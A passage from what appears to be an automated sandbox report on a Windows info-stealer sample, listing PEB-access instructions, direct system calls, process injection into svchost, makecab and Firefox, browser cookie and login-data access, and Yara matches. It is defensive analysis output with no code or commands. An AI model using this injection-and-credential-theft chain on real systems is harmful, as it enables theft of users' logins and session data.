            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E30BCD mov eax, dword ptr fs:[00000030h]1_2_02E30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDEBD0 mov eax, dword ptr fs:[00000030h]1_2_02EDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40BBE mov eax, dword ptr fs:[00000030h]1_2_02E40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40BBE mov eax, dword ptr fs:[00000030h]1_2_02E40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2CB7E mov eax, dword ptr fs:[00000030h]1_2_02E2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC6B40 mov eax, dword ptr fs:[00000030h]1_2_02EC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC6B40 mov eax, dword ptr fs:[00000030h]1_2_02EC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFAB40 mov eax, dword ptr fs:[00000030h]1_2_02EFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED8B42 mov eax, dword ptr fs:[00000030h]1_2_02ED8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDEB50 mov eax, dword ptr fs:[00000030h]1_2_02EDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5EB20 mov eax, dword ptr fs:[00000030h]1_2_02E5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5EB20 mov eax, dword ptr fs:[00000030h]1_2_02E5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF8B28 mov eax, dword ptr fs:[00000030h]1_2_02EF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF8B28 mov eax, dword ptr fs:[00000030h]1_2_02EF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFA8E4 mov eax, dword ptr fs:[00000030h]1_2_02EFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02E6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02E6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E8C0 mov eax, dword ptr fs:[00000030h]1_2_02E5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E30887 mov eax, dword ptr fs:[00000030h]1_2_02E30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBC89D mov eax, dword ptr fs:[00000030h]1_2_02EBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBE872 mov eax, dword ptr fs:[00000030h]1_2_02EBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBE872 mov eax, dword ptr fs:[00000030h]1_2_02EBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC6870 mov eax, dword ptr fs:[00000030h]1_2_02EC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC6870 mov eax, dword ptr fs:[00000030h]1_2_02EC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E42840 mov ecx, dword ptr fs:[00000030h]1_2_02E42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E60854 mov eax, dword ptr fs:[00000030h]1_2_02E60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E34859 mov eax, dword ptr fs:[00000030h]1_2_02E34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E34859 mov eax, dword ptr fs:[00000030h]1_2_02E34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E52835 mov eax, dword ptr fs:[00000030h]1_2_02E52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E52835 mov eax, dword ptr fs:[00000030h]1_2_02E52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E52835 mov eax, dword ptr fs:[00000030h]1_2_02E52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E52835 mov ecx, dword ptr fs:[00000030h]1_2_02E52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E52835 mov eax, dword ptr fs:[00000030h]1_2_02E52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E52835 mov eax, dword ptr fs:[00000030h]1_2_02E52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A830 mov eax, dword ptr fs:[00000030h]1_2_02E6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED483A mov eax, dword ptr fs:[00000030h]1_2_02ED483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED483A mov eax, dword ptr fs:[00000030h]1_2_02ED483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBC810 mov eax, dword ptr fs:[00000030h]1_2_02EBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBE9E0 mov eax, dword ptr fs:[00000030h]1_2_02EBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E629F9 mov eax, dword ptr fs:[00000030h]1_2_02E629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E629F9 mov eax, dword ptr fs:[00000030h]1_2_02E629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC69C0 mov eax, dword ptr fs:[00000030h]1_2_02EC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E649D0 mov eax, dword ptr fs:[00000030h]1_2_02E649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFA9D3 mov eax, dword ptr fs:[00000030h]1_2_02EFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E309AD mov eax, dword ptr fs:[00000030h]1_2_02E309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E309AD mov eax, dword ptr fs:[00000030h]1_2_02E309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB89B3 mov esi, dword ptr fs:[00000030h]1_2_02EB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB89B3 mov eax, dword ptr fs:[00000030h]1_2_02EB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB89B3 mov eax, dword ptr fs:[00000030h]1_2_02EB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E56962 mov eax, dword ptr fs:[00000030h]1_2_02E56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E56962 mov eax, dword ptr fs:[00000030h]1_2_02E56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E56962 mov eax, dword ptr fs:[00000030h]1_2_02E56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7096E mov eax, dword ptr fs:[00000030h]1_2_02E7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7096E mov edx, dword ptr fs:[00000030h]1_2_02E7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7096E mov eax, dword ptr fs:[00000030h]1_2_02E7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED4978 mov eax, dword ptr fs:[00000030h]1_2_02ED4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED4978 mov eax, dword ptr fs:[00000030h]1_2_02ED4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBC97C mov eax, dword ptr fs:[00000030h]1_2_02EBC97C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EB0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EB892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EC892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EAE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EAE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EBC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E28918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E28918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E36EE0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E36EE0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E36EE0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E36EE0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E68EF5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EBCEA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EBCEA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EBCEA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02ECAEB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02ECAEB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E2AE90 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E2AE90 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E2AE90 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E62E9C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E62E9C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E36E71 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EB0E7F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EB0E7F mov eax, dword ptr fs:[00000030h]

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\makecab.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: NULL target: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe protection: read write
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: NULL target: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\makecab.exe | Thread register set: target process: 8044
            Source: C:\Windows\SysWOW64\makecab.exe | Thread APC queued: target process: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2312008
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8mmZ7Bkoj1.exe"
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe | Process created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\SysWOW64\makecab.exe"
            Source: C:\Windows\SysWOW64\makecab.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: eKxwLXHhqpgy.exe, 00000005.00000002.3561336986.0000000001741000.00000002.00000001.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000005.00000000.2057199980.0000000001741000.00000002.00000001.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000007.00000002.3561462421.0000000001851000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: eKxwLXHhqpgy.exe, 00000005.00000002.3561336986.0000000001741000.00000002.00000001.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000005.00000000.2057199980.0000000001741000.00000002.00000001.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000007.00000002.3561462421.0000000001851000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: eKxwLXHhqpgy.exe, 00000005.00000002.3561336986.0000000001741000.00000002.00000001.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000005.00000000.2057199980.0000000001741000.00000002.00000001.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000007.00000002.3561462421.0000000001851000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: eKxwLXHhqpgy.exe, 00000005.00000002.3561336986.0000000001741000.00000002.00000001.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000005.00000000.2057199980.0000000001741000.00000002.00000001.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000007.00000002.3561462421.0000000001851000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
            Source: 8mmZ7Bkoj1.exe | Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

            Stealing of Sensitive Information

            Source: Yara match | File source: 1.2.svchost.exe.2410000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.2410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.3563473884.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2162734748.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3560663904.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3561586168.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3561735545.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\makecab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\makecab.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 1.2.svchost.exe.2410000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.2410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.3563473884.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
